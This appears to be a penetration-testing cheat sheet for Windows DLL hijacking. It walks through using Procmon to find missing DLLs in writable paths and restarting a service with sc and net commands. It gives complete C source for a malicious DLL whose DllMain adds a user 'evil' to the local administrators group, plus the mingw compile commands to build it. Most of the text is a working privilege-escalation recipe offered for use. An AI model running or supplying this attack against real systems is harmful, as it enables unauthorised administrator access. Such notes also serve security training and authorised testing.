DLL/EXE Hijacking
DLL/EXE Hijacking
Run Procmon as administrator in rdp session
Add filters
Result - is - NAME NOT FOUND - Include - click add
Path - ends with - .dll - include - click add
.apply and okay
cmd.exe
sc stop dllsvc or servicename
or sc.exe stop dllsvc
sc start dllsvc
OR net stop <servicename>
net start <servicename>
Now procmon will show more output
Check for any .dll file path which is writable
Now create same .dll file using windows_dll.c script in kali
<aside> 👨💻 // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { //or we can add a new user to administrator group system("cmd.exe /k net user evil pass1234 /add"); system("cmd.exe /k net localgroup administrators evil /add"); ExitProcess(0); } return TRUE; }
</aside>
x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll
transfer .dll to wrtable location found on Procmon
sc stop dllsvc & sc start dllsvc
now evil user has been added in administrator group
List
Last updated